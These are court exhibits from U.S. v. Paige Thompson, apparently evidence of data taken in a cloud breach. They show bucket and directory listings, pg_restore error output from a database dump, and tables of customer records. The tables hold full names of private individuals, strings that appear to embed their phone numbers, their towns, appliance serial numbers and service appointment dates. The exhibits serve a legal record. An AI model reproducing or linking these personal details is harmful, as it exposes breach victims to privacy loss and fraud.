- backups.us-east-1.backup.dat.apperian
- backups.us-east-1.db.apperian
- backups.us-east-1.gov.dat.apperian
- backups.us-east-1.gov.db.apperian
- backups.us-west-2.db.apperian
- backups.us-west-2.gov.dat.apperian
- backups.us-west-2.gov.db.apperian
- cdn.apperian.com.assets
- cdn.eu-central-1.cats.apperian.eu
- cdn.eu-central-1.ease.apperian.eu
- cdn.eu-central-1.qa2ease.qa.apperian.com
- cdn.eu-central-1.qa7ease.qa.apperian.com
- cdn.eu-west-1.cats.apperian.eu
- cdn.eu-west-1.ease.apperian.eu
- cdn.eu-west-1.qa2ease.qa.apperian.com

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 721
Admitted_____



```
                                               aire-db001.apperian.com — pg_restore › pg_restore -j 8 -U mpelaggi -d apperian ease.dump — 197×59

pg_restore: while PROCESSING TOC:
pg_restore: from TOC entry 78; 2615 27639 SCHEMA accounts ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA accounts OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 73; 2615 27421 SCHEMA analytics ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA analytics OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 74; 2615 27640 SCHEMA applications ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA applications OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 6; 2615 27860 SCHEMA bucardo ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA bucardo OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 75; 2615 27642 SCHEMA devices ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA devices OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 76; 2615 27643 SCHEMA downloads ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA downloads OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 29; 2615 276009 SCHEMA general ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA general OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 77; 2615 161768 SCHEMA policies ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA policies OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 79; 2615 27647 SCHEMA reviews ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA reviews OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 80; 2615 27648 SCHEMA tracking ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER SCHEMA tracking OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 600; 1255 120233 FUNCTION count_estimate(text) ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER FUNCTION accounts.count_estimate(query text) OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 679; 1255 27779 FUNCTION delete_permission(text) ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER FUNCTION accounts.delete_permission(perm_id text) OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 678; 1255 27780 FUNCTION delete_rolepermissions(text, text) ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER FUNCTION accounts.delete_rolepermissions(role_id text, perm_id text) OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 680; 1255 27781 FUNCTION update_rolepermissions(text, text) ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
Command was: ALTER FUNCTION accounts.update_rolepermissions(role_id text, perm_id text) OWNER TO "ApperianEAS_WebService";

pg_restore: from TOC entry 602; 1255 27782 FUNCTION update_rolepermissions.superadmin(text) ApperianEAS_WebService
pg_restore: error: could not execute query: ERROR:  role "ApperianEAS_WebService" does not exist
```

721-002



```
42lines.net
├── [   1281883 Mar 28  2019]  instances.us-east-1
└── [     36709 Mar 28  2019]  instances.us-west-2

0 directories, 2 files
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 730
Admitted_____

```
cicd-instance/
├── [        4096 Mar 12   2019]  baseimagegold
├── [        4096 May 28   2019]  ccfresearch-pcaps
├── [        4096 Mar 12   2019]  cf-templates-197cv9t28p32b-us-west-2
├── [        4096 Mar 12   2019]  cfmc-dv-test
├── [        4096 Mar 12   2019]  cfmc-john
├── [        4096 Mar 12   2019]  cfmc-survent-installers
├── [        4096 Mar 12   2019]  chef-883
├── [        4096 May 28   2019]  colo-imports
├── [        4096 Mar 12   2019]  config-bucket-cfmc
├── [        4096 Mar 12   2019]  dev1-docker-config
├── [        4096 Mar 12   2019]  devops-base-images
├── [        4096 Mar 12   2019]  elasticbeanstalk-us-west-1-169157730924
├── [        4096 Mar 12   2019]  elasticbeanstalk-us-west-2-169157730924
├── [        4096 May 28   2019]  eng-jimd
├── [        4096 May 28   2019]  expect-script
├── [        4096 May 28   2019]  gobypals
├── [        4096 Mar 12   2019]  gold7bucket
├── [        4096 Mar 12   2019]  gold7new
├── [        4096 Mar 12   2019]  goldbucket
├── [        4096 Mar 12   2019]  goldcos7
├── [        4096 Mar 12   2019]  goldtestbucket
├── [        4096 Mar 12   2019]  loggly-sauron
├── [        4096 Mar 12   2019]  logszylun
├── [        4096 Mar 12   2019]  pbximport
├── [        4096 Mar 12   2019]  qclb-logs
├── [        4096 Mar 12   2019]  sip-traffic
├── [        4096 Mar 12   2019]  smokeping.cfmc.com
├── [        4096 Mar 12   2019]  stage-ivr-logs
├── [        4096 Mar 12   2019]  starbucks.cfmc.com
├── [        4096 Mar 12   2019]  survox-customers
├── [        4096 Mar 12   2019]  survox-dennis-test
├── [        4096 Mar 12   2019]  survox-deploy-scripts
├── [        4096 Mar 12   2019]  survox-glacier
├── [        4096 Mar 12   2019]  survox-prod-releases
├── [        4096 May 28   2019]  survox-pub
├── [        4096 Mar 12   2019]  survox-ssl-certs
├── [        4096 Mar 12   2019]  survoxbackup
├── [        4096 May 28   2019]  survoxdevopsbilling
├── [        4096 Mar 12   2019]  survoxdevopsbilling2
├── [        4096 Mar 12   2019]  survoxmaintenance
├── [        4096 Mar 12   2019]  test8812.survoxinc.com
└── [        4096 Mar 12   2019]  twilio-cfmc-com-logs

42 directories, 0 files
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 740
Admitted_____

| | | | | | | | | | | | | | | | |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 1 | 256 | | A006129268 | 001 | 02 050104 | ASHLEY | BURTON | 010105 02 2565066457201405101244466i1178 | 0 | 1 02 | 120104001 | 02 | | |
| 2 | 580 | | A006129397 | 001 | 0 01 00 | BRENDA | HANSON | 010101 0 5802799056201405121445491i1198 | 0 | 1 01 | 2 00028 | 01 | | |
| 3 | 314 | | A006 | 001 | | JAMES | HUGHES | | | | | 02 | | |
| 4 | 334 | | A006129274 | 001 | 02 280127 | SHELIA | RANDOLPH | 010128 02 3347032119201405101303006i1049 | 0 | 1 01 | 120127001 | 01 | | |
| 5 | 571 | | A005129267 | 001 | 02 040103 | SHARON | HODGE | 010104 02 5712256235320140510124120i1219 | 0 | 1 01 | 120103001 | 01 | | |
| 6 | 931 | | A006 | 001 | | TOM | SCHIRLE | | | | | 01 | | |
| 7 | 214 | | A006 | 001 | | ARLEEN | MARTINEZ | | | | | 02 | | |
| 8 | 314 | | A006129046 | 001 | 02 040103 | MICHELLE | PATTERSON | 010104 02 3144404304201405061824512i1202 | 0 | 1 01 | 120103001 | 01 | | |
| 9 | 407 | | A005 2014053009395150001 | | | WILLIAM/TAMMY | BLUE | | | | | 01 | | |
| 10 | 717 | | A005129368 | 001 | 02 050104 | VICTOR | SHREINER JR | 010105 02 7176265931201405123151011202 | 0 | 1 01 | 120104001 | 01 | | |
| 11 | 503 | | A008129355 | 001 | 0 02 00 | WILLI | AIGNER | 010102 0 5035728030201405121204421i1014 | 0 | 1 01 | 2 00026 | 01 | | |
| 12 | 804 | | A005 | 001 | | BETH | MCDANIEL | | | | | 01 | | |
| 13 | 757 | | A005129064 | 001 | 02 070107 | JACOB | RYDER | 010107 02 7573444234201405041859592i1152 | 0 | 1 02 | 120107001 | 02 | | |
| 14 | 760 | | A008 | 001 | | MARY | DUKE | | | | | | | |
| 15 | 985 | | A006129357 | 001 | 01 210120 | GARY | WATSON | 010121 01 9856373538201405121214431i1014 | 0 | 11 | 03120120001 | 03 | | 1 1 |
| 16 | 918 | | A006 | 001 | | CANDACE | BOWERS | | | | | 01 | | |
| 17 | 518 | | A005 | 001 | | STEVEN | HURLEY | | | | | | | |
| 18 | 501 | | A006129405 | 001 | 02 070106 | LAWANA | HAWKINS | 010107 02 5019084505201405121452031i1181 | 0 | 1 01 | 120106001 | 01 | | |
| 19 | 757 | | A005129002 | 001 | 02 060105 | MARGARET | MURPHY | 010106 02 7572537905201405061709132i1202 | 0 | 1 01 | 120105001 | 01 | | |
| 20 | 918 | | A006 | 001 | | MARY | GUEST | | | | | | | |
| 21 | 928 | | A008 | 001 | | LEAH | STRAUB | | | | | 01 | | |
| 22 | 304 | | A005129001 | 001 | 02 040103 | BOBBY | ALLISON | 010104 02 3047632525201405061708092i127 | 0 | 1 01 | 120103001 | 01 | | |
| 23 | 662 | | A006129269 | 001 | 02 040104 | SHANNON | SCHWALL | 010104 02 6624029756201405101245336i1181 | 0 | 1 01 | 120104001 | 01 | | |
| 24 | 806 | | A006 | 001 | | DUSTIN | BLADES | | | | | | | |
| 25 | 828 | | A006 | 001 | | PETER | CUTLER | | | | | 01 | | |
| 26 | 956 | | A006 | 001 | | RAMONA | MEDRANO | | | | | 01 | | |
| 27 | 559 | | A000 | 001 | | DIANA | GOMEZ | | | | | | | |
| 28 | 631 | | A005 | 001 | | LISA | MONTOYA | | | | | 02 | | |
| 29 | 804 | | A005 | 001 | | KRISTIN | LIND | | | | | 01 | | |
| 30 | 341 | | A006129049 | 001 | 02 070106 | JERRY | BENAVIDES | 010107 02 3612229370201405061829152i1152 | 0 | 1 01 | 120106001 | 01 | | |
| 31 | 515 | | A006 | 001 | | ANDRIA | VOLKMANN | | | | | | | |
| 32 | 940 | | A006129497 | 001 | 02 060106 | KEITH | PISTOCCO | 010106 02 9402286378201405131850092i1156 | 0 | 1 01 | 120106001 | 01 | | |
| 33 | 909 | | A008129266 | 001 | 02 040103 | ROGER | MURO | 010104 02 9055948589201405101234516i1181 | 0 | 1 01 | 120103001 | 01 | | |
| 34 | 650 | | A008129201 | 001 | 01 020102 | GURKIRPAL | SEHGAL | 010102 01 6507800200201405082301184i1126 | 0 | 1 02 | 120102002 | 02 | | |
| 35 | 602 | | A000129106 | 001 | 0 02 00 | FRANCES | MENDOZA | 010102 0 6022768054201405062116462i202 | 0 | 1 01 | 2 00023 | 01 | | |
| 36 | 586 | | A006 | 001 | | THERESA | RINKER | | | | | 01 | | |
| 37 | 772 | | A005 | 001 | | DANIELLE | SMITH | | | | | | | |
| 38 | 315 | | A005129004 | 001 | 02 090108 | ESTER | METZGER | 010109 02 3153368249201405061718472i1148 | 0 | 1 01 | 120108001 | 01 | | |
| 39 | 217 | | A006129047 | 001 | 02 030002 | ANTOINETTE | SCHMITZ | 010103 02 2176298279201405061825352i127 | 0 | 1 01 | 120002001 | 01 | | |
| 40 | 614 | | A005 | 001 | | ROBERT | BICKMEIER | | | | | | | |
| 41 | 417 | | A006129048 | 001 | 02 040103 | ANDREA | RULE | 010104 02 4178621750201405061827142i157 | 0 | 1 01 | 120103001 | 01 | | |
| 42 | 318 | | A006129272 | 001 | 01 130112 | RUSSELL | HEATH | 010113 01 3182186741201405101302306i1181 | 0 | 1 01 | 120112001 | 01 | | |
| 43 | 402 | | A006129278 | 001 | 01 120112 | JOHN | SUTTON | 010112 01 4024213132201405101316406i1181 | 0 | 1 01 | 120112001 | 01 | | |

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 741
Admitted_____



741-002

741-003

| | | | |
|---|---|---|---|
| 1 | #20140510123936.1178_03107 | 3359 | 01.1703.6704.83 |
| 2 | #20140512144415.1198_03022 | 2972 | 00.0001.12 |
| 3 | | 8304 | |
| 4 | #20140510123238.1049_03016 | 495 | 01.1827.0828.27 |
| 5 | #20140510123688.1219_03063 | 8133 | 00.7203.0203.73 |
| 6 | | 2865 | |
| 7 | | 234 | |
| 8 | #20140506182019.1202_03106 | 6558 | 00.7503.4504.20 |
| 9 | | 8329 | |
| 10 | #20140512130955.1202_03106 | 4899 | 00.6004.1004.70 |
| 11 | #20140512120233.1014_03034 | 9483 | 00.0001.75 |
| 12 | | 4832 | |
| 13 | #20140506185213.1152_03113 | 6264 | 00.6006.7507.35 |
| 14 | | 8264 | |
| 15 | #20140506182029.1198_03022 | 707 | 01.3519.7321.08 |
| 16 | | 2416 | |
| 17 | | 7124 | |
| 18 | #20140512144433.1181_03041 | 6076 | 00.7006.3807.08 |
| 19 | #20140506170310.1202_03106 | 2549 | 00.9004.6205.52 |
| 20 | | 6064 | |
| 21 | | 8877 | |
| 22 | #20140506170359.1127_03084 | 1413 | 00.9802.7703.75 |
| 23 | #20140510124101.1181_03041 | 668 | 00.6203.5204.13 |
| 24 | | 3901 | |
| 25 | | 2828 | |
| 26 | | 219 | |
| 27 | | 2029 | |
| 28 | | 3282 | |
| 29 | | 4837 | |
| 30 | #20140506182144.1152_03113 | 3839 | 00.5006.4806.98 |
| 31 | | 6436 | |
| 32 | #20140513184318.1156_03085 | 7400 | 00.6005.7006.30 |
| 33 | #20140510123035.1181_03041 | 8002 | 00.6702.9803.65 |
| 34 | #20140508225935.1126_03102 | 9157 | 00.5501.7502.30 |
| 35 | #20140506211408.1202_03106 | 1970 | 00.0001.82 |
| 36 | | 4536 | |
| 37 | | 5427 | |
| 38 | #20140506170937.1148_03104 | 5842 | 00.5508.2208.77 |
| 39 | #20140506182226.1127_03084 | 3390 | 00.4002.3802.78 |
| 40 | | 2922 | |
| 41 | #20140506182239.1157_03037 | 7444 | 00.8503.2204.07 |
| 42 | #20140510124833.1181_03041 | 806 | 00.6712.3513.02 |
| 43 | #20140510130344.1181_03041 | 2417 | 00.6011.5512.15 |

| | | | | |
|---|---|---|---|---|
| 1 | D762374791SIEBEL | 12/20/2012APP - WHIRLPOOL | REFRIGERATOR | WRF990SLAM00 | K23307053 |
| 2 | D761493106SIEBEL | 11/12/2011APP - SAMSUNG | REFRIGERATOR | RF263AEBP | JJ054GBBS01651X |
| 3 | D762531671SIEBEL | 02/20/2011APP - WHIRLPOOL | REFRIGERATOR | GSS26C5XXY | HR02527922 |
| 4 | D753346724SIEBEL | 01/27/2012APP - WHIRLPOOL | RANGE | WFG374LVB3 | R14511054 |
| 5 | D762851113SIEBEL | 10/07/2011APP - WHIRLPOOL | DISHWASHER | WDT710PAYM0 | F13813887 |
| 6 | D762545802SIEBEL | 12/18/2012APP - WHIRLPOOL | REFRIGERATOR | WRF990SLAM | K24125464 |
| 7 | D762493715SIEBEL | 08/25/2012APP - SAMSUNG | REFRIGERATOR | RF263TEAESR | V42242BC400620R |
| 8 | D762381428SIEBEL | 11/27/2011APP - SAMSUNG | WASHER | WF350ANP | Y3NJ54ABC02202K |
| 9 | D76038483ISIEBEL | 11/27/2011APP - WHIRLPOOL | WASHER | WTW7340XW | C13670894 |
| 10 | D756128051SIEBEL | 11/02/2011APP - WHIRLPOOL | WASHER | WTW5640XW | C14330255 |
| 11 | D762521540SIEBEL | 11/08/2010APP - FRIGIDAIRE | REFRIGERATOR | LGHB2869LF | 4A04202780 |
| 12 | D763135167SIEBEL | 07/08/2012APP - SAMSUNG | REFRIGERATOR | RS261MDWP | JJ674EBC404379Z |
| 13 | D762834495SIEBEL | 09/11/2011APP - WHIRLPOOL | WASHER | WFW9640XW | CS11110028 |
| 14 | D761635304SIEBEL | 12/29/2011APP - SAMSUNG | WASHER | WF350ANP | CONFIRM-348157WF350ANP |
| 15 | D761526046SIEBEL | 04/18/2012APP - MAYTAG | WASHER | MVWC200XW | GETINHOME |
| 16 | D763113756SIEBEL | 07/31/2011APP - SAMSUNG | DRYER | DV215AEW | GETINHOME |
| 17 | D762895395SIEBEL | 11/20/2011APP - GE | REFRIGERATOR | GFSS2HCYSS | VV306297 |
| 18 | D762951359SIEBEL | 09/22/2011APP - FRIGIDAIRE | REFRIGERATOR | FFHS2611LB | 4A22914486 |
| 19 | D763075213SIEBEL | 08/28/2012APP - GE | WASHER | GTWN4250DWS | UNKNOWN |
| 20 | D762350312SIEBEL | 07/28/2012APP - WHIRLPOOL | REFRIGERATOR | WSF26C5EXF | HR22609555 |
| 21 | D761345006SIEBEL | 09/22/2012APP - WHIRLPOOL | REFRIGERATOR | GI6SDRXXY07 | K20400907 |
| 22 | D762682084SIEBEL | 05/18/2012APP - WHIRLPOOL | WASHER | WTW4800XQ | C21538387 |
| 23 | D762951848SIEBEL | 11/19/2012APP - MAYTAG | DISHWASHER | MDB7749SAM | CONFIRM-F24805270 |
| 24 | D762534875SIEBEL | 08/27/2011APP - WHIRLPOOL | RANGE | WFE301LVS | R12843211 |
| 25 | D762157585SIEBEL | 04/02/2012APP - SAMSUNG | REFRIGERATOR | RS261MDWP | JJ674GBB501566Z |
| 26 | D755521817SIEBEL | 10/07/2011APP - FRIGIDAIRE | REFRIGERATOR | LGHN2844MF | 4A11513227 |
| 27 | D761924464SIEBEL | 09/14/2011APP - WHIRLPOOL | MICROWAVE | GMH3304KVS | CONFIRM-T802929241 |
| 28 | D758683828SIEBEL | 05/20/2012APP - FRIGIDAIRE | REFRIGERATOR | LGUB2642LF3 | 4A11817067 |
| 29 | D763367425SIEBEL | 01/20/2012APP - WHIRLPOOL | REFRIGERATOR | GB2FHDXWS | K14013600 |
| 30 | D762850939SIEBEL | 02/05/2011APP - WHIRLPOOL | WASHER | WTW7340XW | C04372894 |
| 31 | D762856151SIEBEL | 04/19/2012APP - WHIRLPOOL | REFRIGERATOR | GI6SDRXXY07 | K20307556 |
| 32 | D762885285SIEBEL | 11/03/2011APP - SAMSUNG | WASHER | WF350ANR | Y09554AB900419M |
| 33 | D76314139ISIEBEL | 02/18/2011APP - SAMSUNG | WASHER | WA400PJHDWR/AA | Y69Q5AECA078372 |
| 34 | D762542670SIEBEL | 11/20/2011APP - SAMSUNG | REFRIGERATOR | RF4287HARS | I02043CBA04891H |
| 35 | D762888894SIEBEL | 10/23/2011APP - WHIRLPOOL | RANGE | WFG374LVS | R13810010 |
| 36 | D763088055SIEBEL | 11/19/2011APP - FRIGIDAIRE | DISHWASHER | FGHD2433KF | CONFIRM-TR13553306 |
| 37 | D762375105IEBEL | 05/30/2011APP - SAMSUNG | REFRIGERATOR | RS267TDRS | JJ774GBB100279X |
| 38 | D763575303SIEBEL | 09/09/2012APP - WHIRLPOOL | REFRIGERATOR | GB2FHDXWQ02 | K14816336 |
| 39 | D763453507SIEBEL | 03/12/2011APP - WHIRLPOOL | WASHER | WTW5640XW | C03631573 |
| 40 | D762396615SIEBEL | 06/13/2012APP - WHIRLPOOL | REFRIGERATOR | ED5PVEXWS | S10620557 |
| 41 | D763354557SIEBEL | 04/21/2011APP - WHIRLPOOL | REFRIGERATOR | ED5VHEXVB | S10920769 |
| 42 | D762568364SIEBEL | 02/19/2013APP - WHIRLPOOL | UPRIGHT / CHEST FREEZER | EV161NZTQ | U30602128 |
| 43 | D761473133SIEBEL | 07/06/2013APP - GE | DISHWASHER | GDF520PGDBB | GETINHOME |

| | | | | | | | | |
|---|---|---|---|---|---|---|---|---|
| 1 | BOBS APPLIANCE SERVICE | 40395 | (256) | 513579806 - BOBS APPLIANCE SERVICE | 1-GHXD43 | Service Contract | Service Contract | 0109394812355155359002 |
| 2 | JOHNNY'S APPLIANCE | 28785 | (405) | 429529112 - JOHNNY'S APPLIANCE | 1-GKHMF6 | Service Contract | Service Contract | 0000501111316166433004 |
| 3 | DIRECT MAYTAG HAC | 40072 | (314) | 180470430 - DIRECT MAYTAG HAC | 1-GGWN76 | Service Contract | Service Contract | 0276101411079124308001 |
| 4 | A & E Factory Service | ALT63193 | (380) | 480359451 - A & E Factory Service | 1-FRBN5A | Service Contract | Service Contract | 0073604312027172903003 |
| 5 | A & E Factory Service | ALT63193 | (388) | 480359451 - A & E Factory Service | 1-GG0J19 | Service Contract | Service Contract | 0065602211280064825006 |
| 6 | SOLL'S APPLIANCE | 17394 | (615) | SOLL'S APPLIANCE | 1-GOKGI5 | Service Contract | Service Contract | 0300399612355151950001 |
| 7 | CALLAHANS APPLIANCE INC | 26644 | (388) | 247884802 - CALLAHANS APPLIANCE INC | 1-GO9KBF | Service Contract | Service Contract | 0061000812238126428003 |
| 8 | DIRECT MAYTAG HAC | 40072 | (314) | 180470430 - DIRECT MAYTAG HAC | 1-GHZIQ9 | Service Contract | Service Contract | 0180901211331145524003 |
| 9 | FIELDS APPLIANCE SERVICE INC | 16235 | (407) | 21423 - FIELDS APPLIANCE SERVICE INC | 1-GGHZF1 | Service Contract | Service Contract | 0116101411331115853004 |
| 10 | Video Tech Center | 25645 | (410) | 001 - Video Tech Center | 1-GBS0CW | Service Contract | Service Contract | 0002201011306124440007 |
| 11 | AUTHORIZED APPLIANCE REPAIR CO | 022405 | (623) | shop - AUTHORIZED APPLIANCE REPAIR CO I | 1-GOZKA0 | Service Contract | Service Contract | 0160701510312160446013 |
| 12 | VIRGINIA ELECTRONICS Inc | 28136 | (566) | VIRGINIA ELECTRONICS Inc | 1-GR4T2F | Service Contract | Service Contract | 0011302412202182405001 |
| 13 | VIRGINIA ELECTRONICS Inc | 28136 | (866) | VIRGINIA ELECTRONICS Inc | 1-GPX43I | Service Contract | Service Contract | 0118601411254135731003 |
| 14 | Premier Service Group Enterpri | 16588 | (909) | 250448777 - Premier Service Group Enterpi | 1-GL7HMV | Service Contract | Service Contract | 0100101011292131411006 |
| 15 | SOLAR REFRIGERATION & APPLIANC | 10149 | (504) | 196308 - SOLAR REFRIGERATION & APPLIANCE | 1-GM5Z41 | Service Contract | Service Contract | 0059601412109134719004 |
| 16 | SHELTON'S QUALITY SERVICE | 17654 | (918) | 195718 - SHELTON'S QUALITY SERVICE | 1-GROAEI | Service Contract | Service Contract | 0317900110514141045000 |
| 17 | CANNON'S APPLIANCE SERVICE | 18007 | (863) | 195949 - CANNON'S APPLIANCE SERVICE | 1-GQ9CA0 | Service Contract | Service Contract | 0228201411324134953014 |
| 18 | DAVIS APPLIANCE & REFRIGERATIO | 022649 | (470) | 198322 - DAVIS APPLIANCE & REFRIGERATIO | 1-GQII9Q | Service Contract | Service Contract | 0023608412266113963002 |
| 19 | APPLIANCE REPAIR CENTER | 15602 | (504) | 0111066 - APPLIANCE REPAIR CENTER | 1-GQ355R | Service Contract | Service Contract | 0063204312241160121004 |
| 20 | ELITE APPLIANCE  LLC | 20804 | (918) | 0108735 - ELITE APPLIANCE  LLC | 1-GRSMYF | Service Contract | Service Contract | 0175200912210141545005 |
| 21 | M & S  HOME APPLIANCE | 24177 | (928) | 0060271 - M & S  HOME APPLIANCE | 1-GJ7HFT | Service Contract | Service Contract | 0108201112266125040002 |
| 22 | PRO TV & APPLIANCE | 46808 | (304) | 605662982 - PRO TV & APPLIANCE | 1-GP5JB6 | Service Contract | Service Contract | 0188901412219101421005 |
| 23 | ADVANTAGE APPLIANCE REPAIR | IN19116 | (413) | ADVANTAGE APPLIANCE REPAIR  INC. | 1-GMVZR7 | Service Contract | Service Contract | 0317900109914120240000 |
| 24 | AUSTIN'S APPLIANCE SERVICE | 27362 | (903) | 435211531 - AUSTIN'S APPLIANCE SERVICE | 1-GGJ3SQ | Service Contract | Service Contract | 0181000511239153513003 |
| 25 | GOLDEN IN-HOME SERVICE | 27432 | (770) | 293147892 - GOLDEN IN-HOME SERVICE | 1-GN8TNP | Service Contract | Service Contract | 0052601210932102146004 |
| 26 | AMERICAN TV ELECTRONICS | 25081 | (956) | 001 - AMERICAN TV ELECTRONICS | 1-FYZ06S | Service Contract | Service Contract | 0298001211280163937002 |
| 27 | APPLIANCE REPAIR SPECIALISTS | 19219 | (661) | 93201 - APPLIANCE REPAIR SPECIALISTS | 1-GH9LQY | Service Contract | Service Contract | 0079501511257202852004 |
| 28 | A & E Factory Service | ALT63193 | (388) | 480359451 - A & E Factory Service | 1-G9WDQG | Service Contract | Service Contract | 0191701412141145344002 |
| 29 | VIRGINIA ELECTRONICS Inc | 28136 | (866) | VIRGINIA ELECTRONICS Inc | 1-GS6G98 | Service Contract | Service Contract | 0038108512020118117002 |
| 30 | AUDIO VIDEO DESIGNS | 46272 | (361) | AUDIO VIDEO DESIGNS | 1-GQ0HMR | Service Contract | Service Contract | 0250010011036133721003 |
| 31 | A & E Factory Service | ALT63193 | (388) | 480359451 - A & E Factory Service | 1-GG1NKL | Service Contract | Service Contract | 0317900110414120555000 |
| 32 | CALLAHANS APPLIANCE INC | 26644 | (388) | 247884502 - CALLAHANS APPLIANCE INC | 1-GQ58C8 | Service Contract | Service Contract | 0052503511270202544008 |
| 33 | Best Aid Appliances | 41023 | (760) | 630549646 - Best Aid Appliances | 1-GR5SB1 | Service Contract | Service Contract | 0031604113051134816001 |
| 34 | AT BAY APPLIANCES INC | 45258 | (415) | 632323315 - AT BAY APPLIANCES INC | 1-GQGU5V | Service Contract | Service Contract | 0221101511325202344003 |
| 35 | DINO'S APPL FACTORY SERVICE | 15652 | (800) | 310753766 - DINO'S APPL FACTORY SERVICE | 1-GQ5MJC | Service Contract | Service Contract | 0242101411296060357003 |
| 36 | Mr. Appliance of St. Clair/ | B028645 | (810) | 321232959 - Mr. Appliance of St. Clair/ | 1-GQVSQ2 | Service Contract | Service Contract | 0115601512051151213002 |
| 37 | ACTION APPLIANCE INC | 16767 | (772) | ACTION APPLIANCE INC | 1-GPXGAR | Service Contract | Service Contract | 0070301311150121552006 |
| 38 | A & E Factory Service | ALT63193 | (388) | 480359451 - A & E Factory Service | 1-GSVJPY | Service Contract | Service Contract | 0186501412253145958002 |
| 39 | KEN'S APPLIANCE SERVICE INC | 16306 | (217) | 46056058 - KEN'S APPLIANCE SERVICE INC | 1-GS0ZGF | Service Contract | Service Contract | 0025503111071120564003 |
| 40 | CAPITAL CITY APPLIANCE SERV, I | 16728 | (614) | 32660089 - CAPITAL CITY APPLIANCE SERV, | 1-GOIJ5U | Service Contract | Service Contract | 0018103711164201023002 |
| 41 | COOK'S APPLIANCE | 16357 | (417) | COOK'S APPLIANCE | 1-GS3MIH | Service Contract | Service Contract | 0073501311111102435002 |
| 42 | TWIN CITY APPLIANCE INC. | 36765 | (318) | 1 - TWIN CITY APPLIANCE INC. | 1-GOP2OB | Service Contract | Service Contract | 0317900110114173515000 |
| 43 | ANDY'S APPLIANCE REPAIR INC. | 19184 | (402) | 159505 - ANDY'S APPLIANCE REPAIR INC. | 1-GKASVD | Service Contract | Service Contract | 0273947813187104656001 |

| | | | | | | | |
|---|---|---|---|---|---|---|---|
| 1 | | In-Home | C04/10/201404/16/2014Afternoon Completed | | 04/16/2014ASHLEY | BURTON | MUSCLE SHOALS |
| 2 | | In-Home | C04/05/201404/14/2014All Day   Completed | | 04/25/2014BRENDA | HANSON | KONAWA |
| 3 | | In-Home | C04/11/201404/14/2014Afternoon Completed | | 04/21/2014JAMES | HUGHES | FORISTELL |
| 4 | | In-Home | C02/20/201404/17/2014All Day   Completed | In Home - Repair Com04/17/2014SHELIA | RANDOLPH | TUSKEGEE |
| 5 | | In-Home | C04/14/201404/15/2014All Day   Completed | In Home - Repair Com04/15/2014SHARON | HODGE | WHITE POST |
| 6 | | In-Home | C04/11/201404/15/2014All Day   Completed | | 04/14/2014TOM | SCHIRLE | CUMBERLAND FURNACE |
| 7 | | In-Home | C04/11/201404/16/2014Morning   Completed | | 04/30/2014ARLEEN | MARTINEZ | ROCKWALL |
| 8 | | In-Home | C04/10/201404/15/2014Morning   Completed | | 04/16/2014MICHELLE | PATTERSON | FESTUS |
| 9 | | In-Home | C03/31/201404/17/2014All Day   Completed | | 04/17/2014WILLIAM/TAMMY | BLUE | ORLANDO |
| 10 | PRQ479069 | In-Home | C03/24/201404/16/2014Afternoon Completed | | 04/15/2014VICTOR | SHREINER JR | LITITI |
| 11 | PRQ485540 | In-Home | C04/11/201404/17/2014Morning   Completed | | 04/21/2014WILLI | AIGNER | SUN CITY WEST |
| 12 | | In-Home | C04/15/201404/18/2014Morning   Completed | | 04/21/2014BETH | MCDANIEL | MIDLOTHIAN |
| 13 | PRQ483913 | In-Home | C04/14/201404/15/2014Afternoon Completed | | 04/24/2014JACOB | RYDER | HAMPTON |
| 14 | | In-Home | C04/07/201404/15/2014Afternoon Completed | | 04/14/2014MARY | DUKE | HESPERIA |
| 15 | TBZ140408170306 | In-Home | C04/08/201404/15/2014Afternoon Completed | | 04/15/2014GARY | WATSON | LAROSE |
| 16 | PRQ488930 | In-Home | C04/15/201404/15/2014Afternoon Completed | | 04/24/2014CANDACE | BOWERS | INOLA |
